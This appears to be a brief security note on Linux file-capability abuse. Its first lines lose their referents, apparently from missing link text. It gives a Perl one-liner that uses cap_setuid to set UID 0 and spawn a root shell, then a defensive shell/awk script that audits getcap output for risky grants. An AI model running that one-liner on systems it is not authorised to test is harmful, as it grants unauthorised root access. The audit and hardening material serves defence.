Capabilities are a well-known attack vector. has lots of really good information about the many UNIX/Linux binaries that can be abused.
section talks about Perl and what you can do with CAP_SETUID being set.
If it's set:
/usr/bin/perl = cap_setuid+ep
Then do this:
./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
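To find grants like the one above before someone else does, the following added example (not part of the original page) triages `getcap -r` output and ranks scripting runtimes higher, since they can change UID from a one-liner. The names `audit_caps`, `sample_getcap` and `RISKY_CAPS`, the severity labels, the capability list and the sample lines are assumptions made for this example; paths are assumed to contain no spaces.

```shell
#!/bin/sh
# Added example: flag file capabilities that are root-equivalent on a
# general-purpose binary. RISKY_CAPS is an illustrative list, not exhaustive.
RISKY_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_module cap_sys_ptrace'

# Reads getcap output on stdin, prints "<severity> <path> <capability>" per finding.
audit_caps() {
    awk -v risky="$RISKY_CAPS" '
    BEGIN { n = split(risky, want, " ") }
    NF >= 2 {
        path = $1
        # Everything after the path is the capability text. Older libcap prints
        # "path = cap_setuid+ep", newer libcap prints "path cap_setuid=ep".
        spec = $0
        sub(/^[^ ]+ +/, "", spec)
        sub(/^= +/, "", spec)
        # Scripting runtimes and debuggers are ranked higher than other binaries.
        base = path
        sub(/.*\//, "", base)
        sev = (base ~ /^(perl|python|ruby|php|node|lua|tclsh|gdb)[0-9.]*$/) ? "HIGH" : "REVIEW"
        # A clause with no capability names, such as "=ep", grants every capability.
        if (spec ~ /(^| )=[eip]*[ep]/) { print sev, path, "ALL"; next }
        for (i = 1; i <= n; i++)
            if (spec ~ ("(^|[ ,])" want[i] "([,+=]|$)"))
                print sev, path, want[i]
    }'
}

# Constructed sample covering both getcap output formats (not real scan output).
sample_getcap() {
    cat <<'EOF'
/usr/bin/perl = cap_setuid+ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.11 cap_setuid,cap_net_bind_service=eip
/opt/tools/helper =ep
EOF
}

# Live use: getcap -r / 2>/dev/null | audit_caps
sample_getcap | audit_caps
```

A grant that has no documented reason to exist can be cleared with `setcap -r <path>`.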